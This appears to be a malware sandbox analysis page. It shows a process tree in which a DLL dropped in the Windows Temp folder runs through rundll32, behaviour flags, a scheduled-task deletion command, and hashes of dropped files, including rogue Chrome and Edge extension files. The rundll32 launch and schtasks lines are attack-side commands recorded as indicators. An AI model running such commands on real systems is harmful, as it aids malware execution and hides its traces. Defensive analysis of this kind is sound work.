C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\gjmcrxLt\TEFcZVt.dll",#1 /JCsite_idDSz 3851181⤵PID:4804
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\gjmcrxLt\TEFcZVt.dll",#1 /JCsite_idDSz 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1948 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BinjFlxHFUMMGNOij"3⤵PID:4888
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5cacad263becdf0e04629c31f5b4475e2
SHA1f29a233e11195b5c347a5d858cde9059a2ae3f46
SHA256510394b3b61107f1abd4fff2fb2c1717dee90fee6f3ec5b1c1c2fdfc55fd65a5
SHA512fd3924ef3d39f5d41335cfe1fd888909f3fa5f46cfe5136183b4f8ae3051b2408422f50ea30161726b4c37664d46ae6a9cbc9acc707bc0b07113222686669cb5
-
Filesize
2KB
MD53b4270df66d6eb4c8b59cff909e61836
SHA11dab675683e9d1b7984a1c7d5a290d1bde772e7e
SHA2566e3b686d2dfc9d02c2cf409bcce90720eb2f5c04c0a79277ca4f9b8b67b843dc
SHA51238a9f56b0f9477f7082b95b2cec7fb01803b5b9e0612180043e247f3b8b067283f41d542714e2f14538bec6ab7dc8391678e8303efa834b78d5572b5fe09126e
-
Filesize
2KB
MD561b1cff08e5448f2749132b518106538
SHA1acaf5ccc4500801702122e3e338363f130350a26
SHA256d57c094454d90432cf1798251bb6abc693fba91e26fc4c52bd9d5a8ebd808391
SHA51253966b7fbc3a7feb2a7aeade911e5a562c3493b2dffb317e7fdb2e2ddc9ce838fd1279ba28f4656aeef41700a154f4791466dab60182313d65c55cf8a577b420
-
Filesize
2KB
MD5224188146046285145e47f6a27a6e375
SHA10da41e1af4677c6dc206e33d962cfa6e14ba535f
SHA256f1713da310855055824c6ae21ed3655df6f4d39eb8874966f098707bc5ce94cf
SHA5126e2ef453b6205413155094318e0b9216f921ff56ed563949611e1e8205970b1669bfcb9a76a0fd5ee5988851e780804c332edd24f6fa37527e706beeafe04fad
-
Filesize
2.0MB
MD5d3115d9161c8563786499a5128eb59b8
SHA1a186af6779e14d42c3b2064abc86e358317cc361
SHA256ff4c65a256784513892266b6ab315d7d76cb2a2d5841cd716d22ed9ebc0298db
SHA51210dc29dda3449ad7e5a2b38743e92d149660fd5c6b0e0c6572aaba330a28c3ec3c4b22603d9d9bccfbad333dfc6e0ffdeb896ba14a047a41c3273a52dcfc5512
-
Filesize
2KB
MD51daf7858d66ad38494f70ae207bc47bc
SHA13698a70d0a32d185e120d13e098d6ac3edc98c29
SHA25661b6623b80e73d6194624870c4a585e1e5b89833bb605e9d3ba03eab96766027
SHA5126614d7a74d12c33b1c908539f913b461e6180943548e5b4780cf0cd590532d699d89322724896fb6fe94b5a6f2ee794b1ca17a1e00a3a6fd7262d946a999d715
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD595cc7b3bf21ac583d48cfaf1504840af
SHA1d1f775032c2f07548871dd0ad6333080d70ee54a
SHA256056049a1ef425bd061895d26260be3d1fddce16201138005185367cbff823d52
SHA51257845ce09ebf153ea7e7b02d1984f1bb9c98af11ad625051046ed9cb0dd11b734c30cb80529c4b6bf407791fd241b404554540096d1b3455947c1bf197232a66
-
Filesize
35KB
MD5d4663c2ae63573ddce91ee0819881949
SHA147d1721bb62b429df3a85ee6b3052d7eaba33a08
SHA256aea1a32f518489a0603a5f516ca5d61c4451d87493b1c9ab99bff588aa816065
SHA51293e1f63c00eb3cdfa9c49f0ac9afd85bc39807819f8301438c15405cbd73fec67afe4a35723def3ec5e645ef2f7a17e146260e1abd8c0c4566614777492fae3b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD5d6342910a480d30ccafff897943bc031
SHA159b9e2a701b73a0fa1c06a0cb631be90b944e2db
SHA256e673856141302edf24b7543ae7d3f1b5e098f60ba74cfb1a899516615c450748
SHA5121f6f66fb2e3d54b921c10bb812d289477de6e8f6a2cbfa931888c23113065a43c2e71ea08f75d366e0a077a28fcf00c933e75d29fbf8af026cb251ffcc9145d0
-
Filesize
6.7MB
MD5179fb197a3d7311375c9037091fc224c
SHA1802c18d747c379acd9c9a1fcae6e29636b7bd224
SHA256ff3ef3388be54902b91b3833f2abea5b31fe50f4b5f1cc8be06d6aca1b6683b9
SHA512c2d30d078c1358fcbfa5079893ab21c745df2532deee61b84e3eec395efeded6769a73c3d961fbb7f71260a6303e0f9cf22f37111fb90e7b8d4e4fdbd0337317
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD52987d6a5ea543ee0df5c9b2d810b3147
SHA149917b247a8eae061926d428ffbb22531ea75dd3
SHA2567c7c4a5316a4d437b53af2e05854563768b60eebc694f8a18c59c5908af72658
SHA512d7b85df73c258adc8b62b734697dc3f2a2a2243e84b37fa0dd2d314b282a16a15dcec0fc48aedc6751d59f6cbbff2a8167fb565ecc26480948fdde18d86d03a1
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD55b74da6778ccaa0e1ca4ae7484775943
SHA10a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA51220b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD53ca222869372262badc663f5086509ff
SHA175689ab45426b82a2404c93761820e66d7ec2f16
SHA256f7f0e7d2ec26ac262498b8888b0b5510bdee30a2cd492406a88d46d6df946c72
SHA512fe11e34d02ddc7cc40ebc8201592033f88567ee265510e93578edfd009f4ade529ce58a2215254e38daba5fbe3d5c7f2ace43656bb4b91c3bdd00e05679a64bb
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5139701ea6ec9d1fe423e7c691a45ca41
SHA184169504f0096d347ba3accf92b818af05964852
SHA2565677ac82d6603cedf1b7836aaba1771ff3c9d1553261790e762d853342f2fbac
SHA512384f522fa3e9d6fc79a3a94fe998d995505c5d6df6fe180356478a571d55b94bedc6410d3afcd7a0bbdc7e019ecb8eb7beff419b0561f63aa49584db0eccf895
-
Filesize
6.4MB
MD544f3948cb32c3b8df1fca5ef30116aa0
SHA1c674b72e1e1058d0e29d555abc09d40f0c7c8a0c
SHA25612cd48a7e59081b04ad77863bdfc946ecaeccede9368f6410e05c80ee526a0fe
SHA51209d5de6251c88e853132bc8455f2da4d4922a9059778c5103652da3420cd7f98de983f6e3e9ebbe201bd520ac6dbff4cc95b7f01cf6ea335b05671f99649b5b0
-
Filesize
5KB
MD5076dee9a0e7f704f50435a860ef61ffc
SHA171bfb3f8905b3c81698ce82e5fe37097dd9b9d7c
SHA256153089f4c44b875138ca8d7bbfe3fc6817173c18afa9c44391aad496957c29de
SHA512f494671a802d512087f3c814f581e986f884d83605f642fbf9493d3ca39ce3005436bd25990085dd4e2e2b3a506765f3ef453f8e4a50b686c4cea14b9208ccc6